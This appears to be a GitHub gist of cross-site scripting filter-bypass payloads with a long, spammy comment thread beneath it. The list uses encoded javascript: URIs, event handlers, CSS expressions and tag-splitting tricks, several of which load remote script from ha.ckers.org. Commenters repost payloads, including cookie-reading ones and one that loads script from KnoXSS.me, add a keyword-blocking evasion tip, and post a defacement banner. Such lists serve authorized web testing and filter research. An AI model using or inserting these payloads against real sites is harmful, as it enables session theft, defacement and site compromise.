XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>

@ninja25538 ninja25538 commented Aug 8, 2017

Nice!, Thanks!


@Walidhossain010 Walidhossain010 commented Oct 12, 2017

which worked most??


@Cache-Bounty Cache-Bounty commented Apr 6, 2018

test


@CesBear CesBear commented May 8, 2018

cool


@xeno6696 xeno6696 commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.


@0xINT3 0xINT3 commented Sep 1, 2018

many don't even work. websites are getting smart. :/


@sittminzaw sittminzaw commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work


@IvanGuGon1 IvanGuGon1 commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

@ghost ghost commented Jan 26, 2019


@ghost ghost commented Jan 26, 2019

rip github xss protection


@ghost ghost commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >


@ghost ghost commented Jan 26, 2019

start with > and without the spaces


@ghost ghost commented Jan 26, 2019

fuck


@ghost ghost commented Jan 26, 2019

<h1>no</h1>


@ghost ghost commented Jan 26, 2019

no


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

KNOX


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

KNOX


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

S05PWA==


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

PDFLTk9YPDE=


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

'"KNOX


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

KNOX\


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

confirmK


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

(confirm)(1)


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

'-confirmK-'


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

"-confirmK-"


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

${(confirm)(1)}


@shamrocksu88 shamrocksu88 commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>


@nizeman72 nizeman72 commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>


@nizeman72 nizeman72 commented Feb 12, 2019

iji


@nizeman72 nizeman72 commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>

@nizeman72 nizeman72 commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>

@nizeman72 nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>

@nizeman72 nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>

@nizeman72 nizeman72 commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>


@nizeman72 nizeman72 commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >


@nizeman72 nizeman72 commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>


@nizeman72 nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>


@nizeman72 nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>


@nizeman72 nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>


@nizeman72 nizeman72 commented Feb 12, 2019


@nizeman72 nizeman72 commented Feb 16, 2019

Lol


@nizeman72 nizeman72 commented Feb 16, 2019

test


@nizeman72 nizeman72 commented Feb 16, 2019

<script>alert(fuck)</script>

@Yashin2134 Yashin2134 commented Feb 22, 2019


@Yashin2134 Yashin2134 commented Feb 22, 2019

Skip to content
Search…
All gists
Back to GitHub
New gist
@Yashin2134
187
68 @rvrsh3llrvrsh3ll/xxsfilterbypass.lst
Last active 2 days ago •

<script src="https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec.js"></script>

Code Revisions 4 Stars 187 Forks 68
XSS Filter Bypass List
xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">


@Yashin2134 Yashin2134 commented Feb 22, 2019

<SCRIPT>alert("XSS")</SCRIPT>">


@wlanpsk wlanpsk commented Mar 28, 2019

Mmm


@EDMPL EDMPL commented Apr 1, 2019

test


@EDMPL EDMPL commented Apr 1, 2019

nice


@s04v s04v commented Apr 9, 2019

Test


@itayze itayze commented Apr 13, 2019

<IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&
#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>


@ABCyborg25 ABCyborg25 commented Apr 15, 2019

Hi All,

I am new to InfoSec and need a little help from you dignitaries.

While performing XSS, what if my web application firewall is blocking certain words like Alert, Script, etc.?

TIA for your answers!


@m1lw0rm m1lw0rm commented Apr 16, 2019


@m1lw0rm m1lw0rm commented Apr 16, 2019


@T3ap0T T3ap0T commented Apr 18, 2019

rofl xss in the comments
plz


@UnknownUserG UnknownUserG commented Apr 26, 2019

Prompt('XSS') can be used in place of Alert('XSS') if the alert keyword is blocked


@r3dx00 r3dx00 commented Apr 28, 2019

Markdown allows bold text etc., why y'all flexing?


@yeamplow-com yeamplow-com commented May 7, 2019

AAA


@yeamplow-com yeamplow-com commented May 7, 2019

AAA


@yeamplow-com yeamplow-com commented May 7, 2019

AAA


@yeamplow-com yeamplow-com commented May 7, 2019

AAA


@yeamplow-com yeamplow-com commented May 7, 2019

AAA


@yeamplow-com yeamplow-com commented May 7, 2019

s


@yeamplow-com yeamplow-com commented May 7, 2019

s


@yeamplow-com yeamplow-com commented May 7, 2019

a


@yeamplow-com yeamplow-com commented May 7, 2019

a


@yeamplow-com yeamplow-com commented May 7, 2019

a


@yeamplow-com yeamplow-com commented May 7, 2019

a


@Sachin-hodkasia Sachin-hodkasia commented May 9, 2019

"><img src=x onerror=confirm(12);


@DrShrox DrShrox commented Jun 25, 2019

a


@DrShrox DrShrox commented Jun 25, 2019

<script>alert("xss")</script>

@DrShrox DrShrox commented Jun 25, 2019


@darkness203 darkness203 commented Jun 28, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">


@realarrch realarrch commented Jul 1, 2019

TEST


@aniruddhmistry aniruddhmistry commented Aug 25, 2019

test">


@captain99hook captain99hook commented Sep 2, 2019


@captain99hook captain99hook commented Sep 2, 2019

No description provided.


@captain99hook captain99hook commented Sep 2, 2019

No description provided.


@REHAAAM REHAAAM commented Sep 16, 2019

<SCRIPT>alert("XSS")</SCRIPT>">

@REHAAAM REHAAAM commented Sep 16, 2019

hkora"<


@REHAAAM REHAAAM commented Sep 16, 2019

<SCRIPT>alert("XSS")</SCRIPT>">

@Vishnugadupudi Vishnugadupudi commented Oct 21, 2019

<font/color=blue>vishnu


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

[AAA](';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">


@yeamplow-com yeamplow-com commented Oct 22, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

#"><img src=M onerror=alert('XSS');>


@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">


<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> [
[" onmouseover="alert('RVRSH3LL_XSS');" ]

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

<>
<IMG SRC= onmouseover="alert('xxs')">
<>


@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

<">
<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG #>
<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019

src=#
<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

<SRC=#>
<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019

IMGSRC=#
<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019

IMG SRC=#
<IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC=#
IMG SRC= onmouseover="alert('xxs')">


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


onmouseover="alert('xxs')">

@yeamplow-com yeamplow-com commented Oct 22, 2019


onmouseover="alert('xxs')">

@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC=>


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC=https:google.com


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

No description provided.


@yeamplow-com yeamplow-com commented Oct 22, 2019

No description provided.


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019


@yeamplow-com yeamplow-com commented Oct 22, 2019

@javascript : alert(1)


@yeamplow-com yeamplow-com commented Oct 22, 2019

@javascriptalert(1)


@yeamplow-com yeamplow-com commented Oct 22, 2019

@javascriptalert


@Lazydev10 Lazydev10 commented Dec 13, 2019


@Lazydev10 Lazydev10 commented Dec 13, 2019


@Lazydev10 Lazydev10 commented Dec 13, 2019


@Lazydev10 Lazydev10 commented Dec 13, 2019


@Lazydev10 Lazydev10 commented Dec 13, 2019


@Lazydev10 Lazydev10 commented Dec 13, 2019


@Lazydev10 Lazydev10 commented Dec 13, 2019


@Lazydev10 Lazydev10 commented Dec 13, 2019


@Lazydev10 Lazydev10 commented Dec 13, 2019

qwe


@Lazydev10 Lazydev10 commented Dec 13, 2019

xss


@Lazydev10 Lazydev10 commented Dec 13, 2019

nice


@Lazydev10 Lazydev10 commented Dec 13, 2019

<script language="php">echo phpinfo();</script>

@Lazydev10 Lazydev10 commented Dec 13, 2019

qwe


@YudTam YudTam commented Jan 14, 2020

</script><script>alert('XSS');</script>


@YudTam YudTam commented Jan 14, 2020

hehe


@MrHackIT MrHackIT commented Jan 15, 2020

GREAT WORK
Helped A Lot
ThankYOU


@yassinek3ch yassinek3ch commented Jan 23, 2020

<style>


@YudTam YudTam commented Jan 23, 2020


@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

lol


@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

link


@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

(.alerr(document.domin);>


@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

lol


@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

%0a%0d


@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

[onerror=alert-xss]


@n0bugs n0bugs commented Feb 8, 2020


@YudTam YudTam commented Feb 23, 2020


@mrbeast0510 mrbeast0510 commented Mar 5, 2020

<script>alert(1)</script>

@Liosion Liosion commented Mar 27, 2020

<script language="php">echo phpinfo();</script>

@Liosion Liosion commented Mar 27, 2020

</script><script>alert(1)</script>


@Liosion Liosion commented Mar 27, 2020

</script><script>alert(1)</script>


@rangeethmj rangeethmj commented Mar 29, 2020


@rangeethmj rangeethmj commented Mar 29, 2020

Hacked


@rangeethmj rangeethmj commented Mar 29, 2020

You Have Been HACKED!


@rangeethmj rangeethmj commented Mar 29, 2020

<TITLE>D3F4C3</TITLE>
                                                           vB@@@B@B@B@Mu.                                                                         
                                                        ,O@B@B@@@B@B@B@B@Bi                                                                       
                                                       ZB@B@B@B@BBMBBBB@@@B@G7                                                                    
                                                     :@@@B@BBBBMBM@MBB@B@B@B@B@ML                                                                 
                                                   .M@B@BBMBMBM@MBB@M@BBB@M@B@B@B@Mi                                                              
                                                  Z@@@@MBMBMBM@BB@@B@B@B@B@M@M@B@B@B@5                                                            
                                                7@B@BBBBB@BBB@B@MBBBMBB@MBMBMBMBB@@@B@@O                                                          
                                               Z@B@B@MBMBBBBBBBMBM@MBMBBBB@MBM@BBMBB@@@B@P                                                        
                                             iB@@@@@BBMBM@BBMBBBBBMBB@M@B@B@M@BBM@MBM@B@@@@Y                                                      
                                            qB@B@B@MBMBB@BBM@BBB@M@B@BBB@B@M@B@M@M@M@B@M@B@B@.                                                    
                                           @B@BBMMMBMBMBM@B@B@MBBBM@BBBBB@M@B@B@M@MBMBMBB@B@B@U                                                   
                                         .@B@BMMMMBMBMBMBMBMBMBMBMBMBBBM@MBMBBBM@BBMBBBBBMBB@B@Z                                                  
                                        :@B@MBMBMBMBMBMBMBMBBBMBMBMBBBMBMBBBMBMBBBBBMBMBBBMBM@B@B                                                 
                                       .@B@MMMBBBM@B@B@B@B@MBMBBBBBMBMBBBMBBMMBMBM@BBBBMBMBMBB@B@B:                                               
                                       @BBMMMBB@BBM@BBBBB@B@BBMBMBMBBBB@B@BBBBMBMBBBMBMBMBMBMBMBB@B0                                              
                                      @BBMBM@B@B@BBMBMBBBMBBBMBB@BBM@B@M@MBB@M@B@B@MBBBB@BBBBBBM@B@B@L                                            
                                     @B@B@BBB@B@M@MBMBMBMBM@B@B@B@BBBBM@MBBBBBM@B@MBMBMBMBMBMBMBMBB@B@B:                                          
                                    SB@BBM@BBMBMMMBMBM@B@B@B@B@M@M@MBM@M@B@MBBBB@MBM@BBBBMBBBMMMMMBM@B@BM.                                        
                                   7B@B@MBMMOMOMMBB@B@B@B@BBM@B@M@B@BBBBBBB@M@BBBBMBMBM@BBB@MBBBMBMMMMM@@@S                                       
                                  rB@BBMMOMMBM@B@BBM@B@MBBBBBB@BBM@B@B@B@B@B@B@B@B@B@B@MBBBMBBBMBB@BBMMMBB@B;                                     
                                 ,B@BMOMMBBBMBB@M@MBB@BBM@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@@@B@BBBBMBMBMBMBB@BM                                    
                                 B@MMOBB@B@BBBBB@BBB@BBM@B@@@B@B@B@B@B@B@MPYF0BB@B@B@B@B@@@B@B@B@B@B@B@MBBBB@@@:                                  
                                B@MBB@M@MBM@M@M@MBB@B@@@B@B@B@B@B@O2i.              :u0@B@@@B@B@@@B@B@B@B@B@B@B@Y                                 
                               F@B@BBMBMBMBMBBBB@B@B@B@B@@@B@Z1i.                       :rFM@B@B@B@B@B@B@B@B@B@B@BL                               
                              .@B@MBMBMBM@BBBBB@@@B@B@B@Bki.                     ....,.... .:YN@B@@@B@@@B@B@B@B@@@B@:                             
                              @@BMMMBB@B@B@@@B@B@@@@@@F:.                           ...,:,:::::iJG@B@B@B@B@B@B@B@@@B@O                            
                             Y@@BBM@B@B@B@B@@@B@B@0k:   ....                               .:irv7LuZB@B@B@B@B@B@B@@@B@@L                          
                             B@B@B@@@B@B@B@B@B@B1,   ......                               ::rr77uSFjPM@B@B@B@B@B@@@B@B@BO                         
                            8@B@B@B@B@B@@@B@BOj;:i::.                               ,YkGGOOOGMEXUXZNkNO@B@B@@@@@@@B@B@B@Bq                        
                           L@B@B@B@@@B@B@B@MESNGMOO8EU7.                         iNMMkuj22Pq88O8GqOMZNGM@B@B@B@@@@@B@@@B@BL                       
                          .@B@B@@@B@B@@@@@BOM@BMO8XSU2u2ULi.                   UMq77LqB@B@B@B@B@B@E@M8OOM@B@B@B@B@B@@@B@B@B                       
                          @B@B@B@B@B@B@B@MBB@B@B@B@@@B0Yr,:iri.              LE7:vMB@@@BM27iri7uGBBG@OM8BB@@@B@B@B@B@B@B@B@J                      
                         ,@@@@B@B@B@B@B@GO@@B@BMOOO@B@B@B@q7..:7i.         :1i.7B@B@B0i.        .LOEMBM8M@B@@@B@B@@@B@@@@@B@                      
                         J@@@B@@@@@B@B@M0M@Mui:,:.. ,;kB@@@B@M;.rL:       rv.0@@@B@1:           .iqOMBMZ@B@B@@@B@B@B@B@B@B@B                      
                         OB@B@B@B@B@B@qEG@MY:.          .2B@@@B@ ...     .: L@B@B1:          ..,:L0@@BGOB@B@B@B@B@B@B@B@B@B@.                     
                         @@B@B@@@B@B@BPqMB8vi,..           :U00.             UqL:           ..::72MB@O8M@B@B@B@@@B@B@B@B@B@B.                     
                         @B@@@B@B@B@B@OEP@MYi:..             .iv;          uPui.             ,ivuEM@OG0BB@B@B@B@B@B@B@B@B@B@.                     
                         B@B@B@B@@@B@B@GuG@jr,. .:;r77vv7:     .L7        OG;.    .:7J15PqOMOu7L5XOFqZEXMB@B@B@B@B@B@B@B@B@@,                     
                         @B@B@B@B@B@B@BBjLB5i:v@BOk1YLYUFGMMqL   ::      r5i.  v0NSS2uYuj2U5N@@kNBSS5P00P@B@@@B@@@B@B@B@B@B@                      
                         B@@@B@B@B@B@B8M5iMBLX@O;7kP0PENSuY7YO@i  :      ii, .@B1N@B@B@B@B@BE:@@@@@NMEXEO@@B@B@B@B@B@B@@@B@M                      
                         @B@B@B@B@B@BBOBkGB@B@B.i@B@B@@@B@B@: X@  ..     i:, 5B  rE@B@@@B@OZq@B@Xju0qqZZB@B@@@B@B@@@B@B@B@Bi                      
                         B@B@BBB@B@B@@BBBB@BB0BB8U1XOO85J:  .u@i  ..     ,:.  u0v,...:i;r7XGS:     .EGNO@B@@@B@B@B@B@B@@@B@                       
                         PB@B@B@B@B@B@@@BOY.    LEqSY7iirLUPUr    ..     ::.    .i;7rr;;::,         .qZ8B@@@B@B@B@B@B@B@B@M                       
                         i@@@B@B@B@B@B@@P:           ....         .      ,:.                      ..:LMO@B@B@B@B@B@B@B@B@B                        
                          @@B@B@B@B@B@BML:                        ..     ,...                  ..,,::2M@B@B@B@B@B@@@B@B@B2                        
                          @B@B@B@B@B@B@MY.. .                     .      .,..               ....::i:;N@B@B@B@B@@@@@B@B@@@                         
                          L@B@B@B@B@B@B@u:.... .                         .....             ..,,::iiiu@B@B@B@B@B@B@B@B@B@r                         
